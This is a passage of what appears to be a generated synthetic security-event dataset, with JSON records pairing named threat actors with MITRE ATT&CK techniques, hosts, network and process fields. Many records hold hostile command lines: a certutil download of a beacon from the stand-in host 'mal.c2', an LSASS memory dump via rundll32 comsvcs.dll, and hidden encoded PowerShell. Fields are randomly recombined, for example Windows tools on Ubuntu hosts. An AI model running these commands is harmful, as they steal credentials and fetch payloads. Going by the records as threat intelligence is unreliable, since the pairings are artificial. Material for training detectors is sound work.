full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-12-03T14:30:10.000Z","user":{"name":"i-7t4bk9ez1jnb","sid":"S-1-5-21-184231195-596188118-3720"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Privilege Escalation","Lateral Movement"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20260214T161212000Z_0015649","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.254.143.91","name":"WIN-FIN-SRV-X07XVP7QMX","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15649FIN7T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.120.166.204","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2025-11-28T08:52:37.000Z","user":{"name":"CORP\\y70b98gx5qyr","sid":"S-1-5-21-945602346-509480592-8889"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence"],"technique_id":"T1570"},"event_id":"evt_scatteredspider_20250413T073257000Z_0015651","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.238.5.199","name":"DB-ORACLE-J1A1EU2RXG","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15651Scattered SpiderT1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.162.182.82","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1010 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-07-18T23:09:08.000Z","user":{"name":"CORP\\asz22vt12ltw","sid":"S-1-5-21-858939550-695376466-1119"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Impact","Discovery","Credential Access"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20250220T033214000Z_0015653","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.83.210.253","name":"IAM-ROLE-FEIGVV00AW","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15653APT41T1546.003"},"network":{"domain":"github.com","dst_ip":"1.48.66.247","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-07-21T23:18:39.000Z","user":{"name":"azuread\\rlhmkgkhzrm9","sid":"S-1-5-21-779418221-500692794-3671"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Initial Access","Exfiltration"],"technique_id":"T1531"},"event_id":"evt_unc4841_20250226T221250000Z_0015655","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.7.2.156","name":"AZURE-VM-QARP1EY4F4","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15655UNC4841T1531"},"network":{"domain":"github.com","dst_ip":"1.152.86.15","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-10-25T20:05:14.000Z","user":{"name":"svc_9g7sgssrx9yk","sid":"S-1-5-21-256653589-523439767-6963"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery","Execution"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20260224T043027000Z_0015657","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.142.66.141","name":"EC2-INST-S49ARBRL8B","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15657Scattered SpiderT1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.122.74.13","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-09-05T13:14:43.000Z","user":{"name":"i-575b415vyemd","sid":"S-1-5-21-446418791-444887629-9417"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Initial Access","Discovery","Persistence"],"technique_id":"T1531"},"event_id":"evt_unc4841_20260828T213001000Z_0015659","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.55.55.139","name":"WIN-FIN-SRV-O4CGIBXX77","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15659UNC4841T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.173.122.112","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-01-29T01:09:07.000Z","user":{"name":"i-z5vqwvql4brk","sid":"S-1-5-21-235922542-506918564-4917"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Command and Control"],"technique_id":"T1059.001"},"event_id":"evt_volttyphoon_20260514T105809000Z_0015661","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.74.160.167","name":"WIN-FIN-SRV-YY9TH2OSDQ","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15661Volt TyphoonT1059.001"},"network":{"domain":"github.com","dst_ip":"1.173.138.127","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-08-29T08:40:04.000Z","user":{"name":"arn:aws:iam::q09g6p7dcu9n","sid":"S-1-5-21-431817489-798815725-3966"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20261029T155435000Z_0015663","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.115.177.233","name":"IAM-ROLE-Y0X1KEPN9Q","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15663Mustang PandaT1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.33.229.111","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-12-26T13:13:21.000Z","user":{"name":"i-66nprjyeu50k","sid":"S-1-5-21-954156905-867617713-4885"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Initial Access"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20250228T151955000Z_0015665","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.75.241.60","name":"DB-ORACLE-TZYOPGG8DT","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15665Volt TyphoonT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.125.130.164","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-04-27T20:15:42.000Z","user":{"name":"i-j4oca46a428p","sid":"S-1-5-21-821419293-664868588-4205"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Execution"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20260618T101855000Z_0015667","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.31.82.54","name":"AZURE-VM-DISRJWWSJJ","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15667FIN7T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.110.45.71","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-09T08:59:35.000Z","user":{"name":"svc_n1u4hiqtjeah","sid":"S-1-5-21-255322371-179016822-3879"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Persistence"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20251212T133617000Z_0015669","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.182.19.234","name":"IAM-ROLE-L78CL5O7FW","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15669Mustang PandaT1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.176.181.116","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-01-18T14:56:04.000Z","user":{"name":"azuread\\4h8keau0xxc8","sid":"S-1-5-21-126530967-872189589-1498"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Command and Control"],"technique_id":"T1566.001"},"event_id":"evt_volttyphoon_20260803T142025000Z_0015671","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.180.212.175","name":"IAM-ROLE-OP007NRPJ9","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15671Volt TyphoonT1566.001"},"network":{"domain":"github.com","dst_ip":"1.179.121.139","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-04T06:17:29.000Z","user":{"name":"azuread\\zmtisbcjrud4","sid":"S-1-5-21-185086550-391597731-2026"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Credential Access","Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_lapsus_20260717T133036000Z_0015673","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.164.88.50","name":"EC2-INST-4YUH88LTLM","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15673Lapsus$T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.184.126.231","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1092 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-12-08T23:46:01.000Z","user":{"name":"arn:aws:iam::8lvbybx90wco","sid":"S-1-5-21-508370367-253943678-3850"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Lateral Movement","Impact"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20250216T062018000Z_0015675","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.158.95.177","name":"WIN-FIN-SRV-MIHVDOVTKJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15675Scattered SpiderT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.53.108.82","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-07-28T06:27:02.000Z","user":{"name":"arn:aws:iam::16uce25d0lel","sid":"S-1-5-21-111334550-566486844-3835"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Collection","Initial Access"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20260602T215901000Z_0015677","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.138.113.26","name":"WIN-FIN-SRV-9241041J6V","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15677UNC4841T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.117.200.62","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 644 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-04-10T03:06:23.000Z","user":{"name":"i-uzfm9gfgyy5g","sid":"S-1-5-21-684161526-623876329-2010"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20261110T053936000Z_0015679","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.169.230.104","name":"APP-WEB-QZHDX2X5M5","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15679FIN7T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.34.87.27","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-05-17T23:59:19.000Z","user":{"name":"i-2x2heqefi92h","sid":"S-1-5-21-141976125-335757271-1950"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Discovery"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20250707T225530000Z_0015681","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.125.163.143","name":"IAM-ROLE-HL5PKD90RL","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15681Lapsus$T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.52.155.136","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-03-31T20:32:39.000Z","user":{"name":"arn:aws:iam::hv63qj9i1rk7","sid":"S-1-5-21-738330560-238876496-3169"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Impact","Privilege Escalation","Reconnaissance"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20261205T103751000Z_0015683","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.120.217.69","name":"WIN-FIN-SRV-BIP6WH602E","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15683Mustang PandaT1570"},"network":{"domain":"github.com","dst_ip":"1.194.190.104","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-08-07T08:26:26.000Z","user":{"name":"svc_yjngip2tbyv1","sid":"S-1-5-21-605745101-631871104-7267"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Impact"],"technique_id":"T1570"},"event_id":"evt_apt41_20250115T195456000Z_0015685","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.42.166.224","name":"IAM-ROLE-ZRWGKE4XS0","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15685APT41T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.63.227.252","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-02-16T05:17:52.000Z","user":{"name":"arn:aws:iam::q5gef2rhbpk7","sid":"S-1-5-21-257183413-227423601-8390"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Command and Control"],"technique_id":"T1098.004"},"event_id":"evt_apt29_20250418T023807000Z_0015687","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.76.102.200","name":"WIN-FIN-SRV-M6SIIURZAZ","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15687APT29T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.65.6.37","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-10-27T04:07:00.000Z","user":{"name":"i-vgun5zmjx1of","sid":"S-1-5-21-165529839-433382182-3457"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Credential Access","Defense Evasion","Privilege Escalation"],"technique_id":"T1484.001"},"event_id":"evt_fin7_20261120T205112000Z_0015689","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.7.87.236","name":"IAM-ROLE-52ULT58AAI","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15689FIN7T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.42.126.251","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 539 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-04-22T20:46:44.000Z","user":{"name":"CORP\\f86ukh4jyhgf","sid":"S-1-5-21-689300817-994717677-9191"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Reconnaissance","Lateral Movement"],"technique_id":"T1484.001"},"event_id":"evt_unc4841_20261027T200446000Z_0015691","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.95.32.85","name":"IAM-ROLE-26RCOPN5V8","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15691UNC4841T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.125.166.42","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1079 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-08-07T10:20:52.000Z","user":{"name":"CORP\\c11wj5f4fqre","sid":"S-1-5-21-934174075-978406399-3773"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery","Exfiltration"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20250420T070317000Z_0015693","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.28.176.131","name":"WIN-FIN-SRV-7N6Y5FJ4TL","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15693APT41T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.29.73.219","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1830 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-19T17:35:59.000Z","user":{"name":"svc_xqxljv1j2ylj","sid":"S-1-5-21-789071107-426188192-4027"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Reconnaissance","Initial Access","Impact"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20251018T074100000Z_0015695","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.254.205.140","name":"AZURE-VM-W0QH0UVGDU","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15695APT29T1003.001"},"network":{"domain":"github.com","dst_ip":"1.35.211.228","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1826 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Network Connection 